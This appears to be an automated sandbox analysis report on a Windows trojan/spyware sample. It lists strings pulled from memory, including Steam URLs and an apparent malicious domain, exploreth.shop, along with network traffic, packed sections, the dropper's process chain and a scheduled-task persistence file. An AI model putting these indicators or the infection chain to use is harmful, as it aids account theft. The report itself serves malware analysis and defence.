Source: 958e367d97.exe, 0000000D.00000003.2748143842.000000000091F000.00000004.00000020.00020000.00000000.sdmp, 958e367d97.exe, 0000000D.00000002.2779548165.00000000009BD000.00000004.00000020.00020000.00000000.sdmp, 958e367d97.exe, 0000000D.00000003.2747615213.00000000009A6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/images/skin_1/footerLogo_valve.png?v=1
Source: 958e367d97.exe, 0000000D.00000003.2748143842.000000000091F000.00000004.00000020.00020000.00000000.sdmp, 958e367d97.exe, 0000000D.00000003.2747615213.00000000009A6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/applications/community/libraries~b28b7af6
Source: 958e367d97.exe, 0000000D.00000003.2748143842.000000000091F000.00000004.00000020.00020000.00000000.sdmp, 958e367d97.exe, 0000000D.00000003.2747615213.00000000009A6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/applications/community/main.js?v=jfdbROVe
Source: 958e367d97.exe, 0000000D.00000003.2748143842.000000000091F000.00000004.00000020.00020000.00000000.sdmp, 958e367d97.exe, 0000000D.00000003.2747615213.00000000009A6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/applications/community/manifest.js?v=39xC
Source: 958e367d97.exe, 0000000D.00000003.2747615213.00000000009A6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/global.js?v=cMt-H-zOgNUp&l=english&am
Source: 958e367d97.exe, 0000000D.00000003.2747615213.00000000009A6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/jquery-1.11.1.min.js?v=gQHVlrK4-jX-&l
Source: 958e367d97.exe, 0000000D.00000003.2747615213.00000000009A6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/modalContent.js?v=uqf5ttWTRe7l&l=engl
Source: 958e367d97.exe, 0000000D.00000003.2747615213.00000000009A6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/modalv2.js?v=zBXEuexVQ0FZ&l=english&a
Source: 958e367d97.exe, 0000000D.00000003.2747615213.00000000009A6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/profile.js?v=GeQ6v03mWpAc&l=english&a
Source: 958e367d97.exe, 0000000D.00000003.2747615213.00000000009A6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/promo/stickers.js?v=CcLRHsa04otQ&l=en
Source: 958e367d97.exe, 0000000D.00000003.2747615213.00000000009A6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/prototype-1.7.js?v=npJElBnrEO6W&l=eng
Source: 958e367d97.exe, 0000000D.00000003.2747615213.00000000009A6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/reportedcontent.js?v=-lZqrarogJr8&l=e
Source: 958e367d97.exe, 0000000D.00000003.2747615213.00000000009A6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/scriptaculous/_combined.js?v=pbdAKOcDIgbC
Source: 958e367d97.exe, 0000000D.00000003.2747615213.00000000009A6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/webui/clientcom.js?v=whw8EcafG167&l=e
Source: 958e367d97.exe, 0000000D.00000003.2747615213.00000000009A6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/shared/css/buttons.css?v=qhQgyjWi6LgJ&l=english&
Source: 958e367d97.exe, 0000000D.00000003.2747615213.00000000009A6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/shared/css/motiva_sans.css?v=-yZgCk0Nu7kH&l=engl
Source: 958e367d97.exe, 0000000D.00000003.2747615213.00000000009A6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/shared/css/shared_global.css?v=Eq36AUaEgab8&l=en
Source: 958e367d97.exe, 0000000D.00000003.2747615213.00000000009A6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/shared/css/shared_responsive.css?v=JL1e4uQSrVGe&
Source: 958e367d97.exe, 0000000D.00000003.2747615213.00000000009A6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/shared/images/header/logo_steam.svg?t=962016
Source: 958e367d97.exe, 0000000D.00000003.2747615213.00000000009A6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/shared/images/responsive/header_logo.png
Source: 958e367d97.exe, 0000000D.00000003.2747615213.00000000009A6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/shared/images/responsive/header_menu_hamburger.png
Source: 958e367d97.exe, 0000000D.00000003.2747615213.00000000009A6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/shared/images/responsive/logo_valve_footer.png
Source: 958e367d97.exe, 0000000D.00000003.2747615213.00000000009A6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/shared/javascript/auth_refresh.js?v=w6QbwI-5-j2S&amp
Source: 958e367d97.exe, 0000000D.00000003.2747615213.00000000009A6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/shared/javascript/shared_global.js?v=PCCoCNLxwF4M&am
Source: 958e367d97.exe, 0000000D.00000003.2747615213.00000000009A6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/shared/javascript/shared_responsive_adapter.js?v=tvQ
Source: 958e367d97.exe, 0000000D.00000003.2747615213.00000000009A6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/shared/javascript/tooltip.js?v=QYkT4eS5mbTN&l=en
Source: 958e367d97.exe, 0000000D.00000002.2779133231.0000000000994000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://exploreth.shop/
Source: 958e367d97.exe, 0000000D.00000002.2779133231.0000000000966000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://exploreth.shop/gJKDA
Source: 958e367d97.exe, 0000000D.00000002.2779133231.0000000000966000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://exploreth.shop/gJKDA%
Source: 958e367d97.exe, 0000000D.00000002.2779133231.0000000000994000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://exploreth.shop/gJKDAP
Source: 958e367d97.exe, 0000000D.00000002.2779133231.0000000000966000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://exploreth.shop/gJKDAS
Source: 958e367d97.exe, 0000000D.00000002.2779133231.0000000000966000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://exploreth.shop/gJKDAs
Source: 958e367d97.exe, 0000000D.00000002.2779133231.000000000093F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://exploreth.shop:443/gJKDA
Source: 958e367d97.exe, 0000000D.00000003.2747723485.0000000000965000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://help.steampowered.com/
Source: 958e367d97.exe, 0000000D.00000003.2747615213.00000000009A6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://help.steampowered.com/en/
Source: 958e367d97.exe, 0000000D.00000003.2747723485.0000000000965000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.steampowered.com/
Source: 958e367d97.exe, 0000000D.00000003.2747723485.0000000000965000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://lv.queniujq.cn
Source: 958e367d97.exe, 0000000D.00000003.2747723485.0000000000965000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://medal.tv
Source: 958e367d97.exe, 0000000D.00000003.2747723485.0000000000965000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://player.vimeo.com
Source: 958e367d97.exe, 0000000D.00000003.2747723485.0000000000965000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://recaptcha.net
Source: 958e367d97.exe, 0000000D.00000003.2747723485.0000000000965000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://recaptcha.net/recaptcha/;
Source: 958e367d97.exe, 0000000D.00000003.2747723485.0000000000965000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://s.ytimg.com;
Source: 958e367d97.exe, 0000000D.00000003.2747723485.0000000000965000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://sketchfab.com
Source: 958e367d97.exe, 0000000D.00000003.2747723485.0000000000965000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steam.tv/
Source: 958e367d97.exe, 0000000D.00000003.2747723485.0000000000965000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steambroadcast-test.akamaized.net
Source: 958e367d97.exe, 0000000D.00000003.2747723485.0000000000965000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steambroadcast.akamaized.net
Source: 958e367d97.exe, 0000000D.00000003.2747723485.0000000000965000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steambroadcastchat.akamaized.net
Source: 958e367d97.exe, 0000000D.00000003.2747723485.0000000000965000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/
Source: 958e367d97.exe, 0000000D.00000003.2748143842.0000000000925000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/$$
Source: 958e367d97.exe, 0000000D.00000003.2747615213.00000000009A6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/?subsection=broadcasts
Source: 958e367d97.exe, 0000000D.00000003.2747615213.00000000009A6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/discussions/
Source: 958e367d97.exe, 0000000D.00000003.2747615213.00000000009A6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/linkfilter/?u=http%3A%2F%2Fwww.geonames.org
Source: 958e367d97.exe, 0000000D.00000003.2747615213.00000000009A6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/login/home/?goto=profiles%2F76561199822375128
Source: 958e367d97.exe, 0000000D.00000003.2747615213.00000000009A6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/market/
Source: 958e367d97.exe, 0000000D.00000003.2747615213.00000000009A6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/my/wishlist/
Source: 958e367d97.exe, 0000000D.00000002.2779133231.00000000008DE000.00000004.00000020.00020000.00000000.sdmp, 958e367d97.exe, 0000000D.00000003.2748143842.000000000095F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/profiles/76561199822375128
Source: 958e367d97.exe, 0000000D.00000002.2779548165.00000000009BD000.00000004.00000020.00020000.00000000.sdmp, 958e367d97.exe, 0000000D.00000003.2747615213.00000000009A6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/profiles/76561199822375128/badges
Source: 958e367d97.exe, 0000000D.00000003.2748143842.000000000091F000.00000004.00000020.00020000.00000000.sdmp, 958e367d97.exe, 0000000D.00000002.2779548165.00000000009BD000.00000004.00000020.00020000.00000000.sdmp, 958e367d97.exe, 0000000D.00000003.2747615213.00000000009A6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/profiles/76561199822375128/inventory/
Source: 958e367d97.exe, 0000000D.00000003.2747615213.00000000009A6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/workshop/
Source: 958e367d97.exe, 0000000D.00000003.2747723485.0000000000965000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamloopback.host
Source: 958e367d97.exe, 0000000D.00000003.2747723485.0000000000965000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/
Source: 958e367d97.exe, 0000000D.00000002.2779133231.0000000000966000.00000004.00000020.00020000.00000000.sdmp, 958e367d97.exe, 0000000D.00000002.2779133231.0000000000994000.00000004.00000020.00020000.00000000.sdmp, 958e367d97.exe, 0000000D.00000003.2747723485.0000000000994000.00000004.00000020.00020000.00000000.sdmp, 958e367d97.exe, 0000000D.00000003.2747723485.0000000000965000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/;
Source: 958e367d97.exe, 0000000D.00000002.2779133231.0000000000966000.00000004.00000020.00020000.00000000.sdmp, 958e367d97.exe, 0000000D.00000003.2747723485.0000000000965000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/;X-Frame-OptionsSAMEORIGINPersistent-AuthWWW-AuthenticateVarysteamCou
Source: 958e367d97.exe, 0000000D.00000003.2747615213.00000000009A6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/about/
Source: 958e367d97.exe, 0000000D.00000003.2747615213.00000000009A6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/explore/
Source: 958e367d97.exe, 0000000D.00000002.2779133231.000000000091C000.00000004.00000020.00020000.00000000.sdmp, 958e367d97.exe, 0000000D.00000003.2747615213.00000000009A6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/legal/
Source: 958e367d97.exe, 0000000D.00000003.2747615213.00000000009A6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/mobile
Source: 958e367d97.exe, 0000000D.00000003.2747615213.00000000009A6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/news/
Source: 958e367d97.exe, 0000000D.00000003.2747615213.00000000009A6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/points/shop/
Source: 958e367d97.exe, 0000000D.00000003.2747615213.00000000009A6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/privacy_agreement/
Source: 958e367d97.exe, 0000000D.00000003.2747615213.00000000009A6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/stats/
Source: 958e367d97.exe, 0000000D.00000003.2747615213.00000000009A6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/steam_refunds/
Source: 958e367d97.exe, 0000000D.00000003.2747615213.00000000009A6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/subscriber_agreement/
Source: 958e367d97.exe, 0000000D.00000003.2747723485.0000000000965000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com
Source: 958e367d97.exe, 0000000D.00000003.2747723485.0000000000965000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/recaptcha/
Source: 958e367d97.exe, 0000000D.00000003.2747723485.0000000000965000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.gstatic.cn/recaptcha/
Source: 958e367d97.exe, 0000000D.00000003.2747723485.0000000000965000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.gstatic.com/recaptcha/
Source: 958e367d97.exe, 0000000D.00000003.2747615213.00000000009A6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20Feedback
Source: 958e367d97.exe, 0000000D.00000003.2747723485.0000000000965000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com
Source: 958e367d97.exe, 0000000D.00000003.2747723485.0000000000965000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49766
Source: unknown	Network traffic detected: HTTP traffic on port 49783 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49786
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49783
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49782
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49780
Source: unknown	Network traffic detected: HTTP traffic on port 49789 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49766 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49795 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49801 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49778 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49774 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49778
Source: unknown	Network traffic detected: HTTP traffic on port 49772 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49777
Source: unknown	Network traffic detected: HTTP traffic on port 49782 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49798
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49774
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49796
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49795
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49772
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49771
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49792
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49790
Source: unknown	Network traffic detected: HTTP traffic on port 49786 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49780 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49804 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49768 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49796 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49802 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49777 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49798 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49804
Source: unknown	Network traffic detected: HTTP traffic on port 49792 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49802
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49768
Source: unknown	Network traffic detected: HTTP traffic on port 49790 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49801
Source: unknown	Network traffic detected: HTTP traffic on port 49771 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49789

Source: unknown

HTTPS traffic detected: 104.73.234.102:443 -> 192.168.2.4:49802 version: TLS 1.2

System Summary

PE file contains section with special chars

Source: L0erlgyZ6f.exe	Static PE information: section name:
Source: L0erlgyZ6f.exe	Static PE information: section name: .idata
Source: L0erlgyZ6f.exe	Static PE information: section name:
Source: rapes.exe.0.dr	Static PE information: section name:
Source: rapes.exe.0.dr	Static PE information: section name: .idata
Source: rapes.exe.0.dr	Static PE information: section name:
Source: random[1].exe.10.dr	Static PE information: section name:
Source: random[1].exe.10.dr	Static PE information: section name: .idata
Source: random[1].exe.10.dr	Static PE information: section name:
Source: 958e367d97.exe.10.dr	Static PE information: section name:
Source: 958e367d97.exe.10.dr	Static PE information: section name: .idata
Source: 958e367d97.exe.10.dr	Static PE information: section name:

Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe

Process Stats: CPU usage > 49%

Source: C:\Users\user\Desktop\L0erlgyZ6f.exe

File created: C:\Windows\Tasks\rapes.job

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Code function: 10_2_004561F0	10_2_004561F0
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Code function: 10_2_0045B700	10_2_0045B700
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Code function: 10_2_00494047	10_2_00494047
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Code function: 10_2_004918D7	10_2_004918D7
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Code function: 10_2_004551A0	10_2_004551A0
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Code function: 10_2_0045CC40	10_2_0045CC40
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Code function: 10_2_00455450	10_2_00455450
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Code function: 10_2_00482C20	10_2_00482C20
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Code function: 10_2_0047B4C0	10_2_0047B4C0
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Code function: 10_2_00495CD4	10_2_00495CD4
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Code function: 10_2_00495DF4	10_2_00495DF4
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Code function: 10_2_0047F6DB	10_2_0047F6DB
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Code function: 10_2_00454EF0	10_2_00454EF0

Source: L0erlgyZ6f.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: L0erlgyZ6f.exe	Static PE information: Section: xxhfmvgp ZLIB complexity 0.9946758166540786
Source: rapes.exe.0.dr	Static PE information: Section: xxhfmvgp ZLIB complexity 0.9946758166540786
Source: random[1].exe.10.dr	Static PE information: Section: avwkzfda ZLIB complexity 0.9946777200600997
Source: 958e367d97.exe.10.dr	Static PE information: Section: avwkzfda ZLIB complexity 0.9946777200600997

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@6/5@11/8

Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe

File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\random[1].exe

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe

Mutant created: \Sessions\1\BaseNamedObjects\006700e5a2ab05704bbb0c589b88924d

Source: C:\Users\user\Desktop\L0erlgyZ6f.exe

File created: C:\Users\user\AppData\Local\Temp\bb556cff4a

Jump to behavior

Source: C:\Users\user\Desktop\L0erlgyZ6f.exe

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\L0erlgyZ6f.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: L0erlgyZ6f.exe	ReversingLabs: Detection: 63%
Source: L0erlgyZ6f.exe	Virustotal: Detection: 65%

Source: L0erlgyZ6f.exe	String found in binary or memory: " /add
Source: L0erlgyZ6f.exe	String found in binary or memory: " /add /y
Source: L0erlgyZ6f.exe	String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: rapes.exe	String found in binary or memory: " /add /y
Source: rapes.exe	String found in binary or memory: " /add
Source: rapes.exe	String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: rapes.exe	String found in binary or memory: " /add /y
Source: rapes.exe	String found in binary or memory: " /add
Source: rapes.exe	String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: 958e367d97.exe	String found in binary or memory: 3Cannot find '%s'. Please, re-install this application

Source: C:\Users\user\Desktop\L0erlgyZ6f.exe

File read: C:\Users\user\Desktop\L0erlgyZ6f.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\L0erlgyZ6f.exe "C:\Users\user\Desktop\L0erlgyZ6f.exe"
Source: C:\Users\user\Desktop\L0erlgyZ6f.exe	Process created: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe "C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe"
Source: unknown	Process created: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Process created: C:\Users\user\AppData\Local\Temp\10198690101\958e367d97.exe "C:\Users\user\AppData\Local\Temp\10198690101\958e367d97.exe"
Source: C:\Users\user\Desktop\L0erlgyZ6f.exe	Process created: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe "C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Process created: C:\Users\user\AppData\Local\Temp\10198690101\958e367d97.exe "C:\Users\user\AppData\Local\Temp\10198690101\958e367d97.exe"	Jump to behavior

Source: C:\Users\user\Desktop\L0erlgyZ6f.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\L0erlgyZ6f.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\Desktop\L0erlgyZ6f.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\Desktop\L0erlgyZ6f.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\L0erlgyZ6f.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\L0erlgyZ6f.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\L0erlgyZ6f.exe	Section loaded: mstask.dll	Jump to behavior
Source: C:\Users\user\Desktop\L0erlgyZ6f.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\L0erlgyZ6f.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\L0erlgyZ6f.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\Desktop\L0erlgyZ6f.exe	Section loaded: dui70.dll	Jump to behavior
Source: C:\Users\user\Desktop\L0erlgyZ6f.exe	Section loaded: duser.dll	Jump to behavior
Source: C:\Users\user\Desktop\L0erlgyZ6f.exe	Section loaded: chartv.dll	Jump to behavior
Source: C:\Users\user\Desktop\L0erlgyZ6f.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\L0erlgyZ6f.exe	Section loaded: oleacc.dll	Jump to behavior
Source: C:\Users\user\Desktop\L0erlgyZ6f.exe	Section loaded: atlthunk.dll	Jump to behavior
Source: C:\Users\user\Desktop\L0erlgyZ6f.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Users\user\Desktop\L0erlgyZ6f.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Users\user\Desktop\L0erlgyZ6f.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\Desktop\L0erlgyZ6f.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\Desktop\L0erlgyZ6f.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\Desktop\L0erlgyZ6f.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\L0erlgyZ6f.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\L0erlgyZ6f.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\L0erlgyZ6f.exe	Section loaded: wtsapi32.dll	Jump to behavior
Source: C:\Users\user\Desktop\L0erlgyZ6f.exe	Section loaded: winsta.dll	Jump to behavior
Source: C:\Users\user\Desktop\L0erlgyZ6f.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\Desktop\L0erlgyZ6f.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\L0erlgyZ6f.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\Desktop\L0erlgyZ6f.exe	Section loaded: windows.fileexplorer.common.dll	Jump to behavior
Source: C:\Users\user\Desktop\L0erlgyZ6f.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\L0erlgyZ6f.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\L0erlgyZ6f.exe	Section loaded: explorerframe.dll	Jump to behavior
Source: C:\Users\user\Desktop\L0erlgyZ6f.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\Desktop\L0erlgyZ6f.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\L0erlgyZ6f.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\L0erlgyZ6f.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\L0erlgyZ6f.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\Desktop\L0erlgyZ6f.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\Desktop\L0erlgyZ6f.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\Desktop\L0erlgyZ6f.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\L0erlgyZ6f.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Desktop\L0erlgyZ6f.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Section loaded: kernel.appcore.dll	Jump to behavior
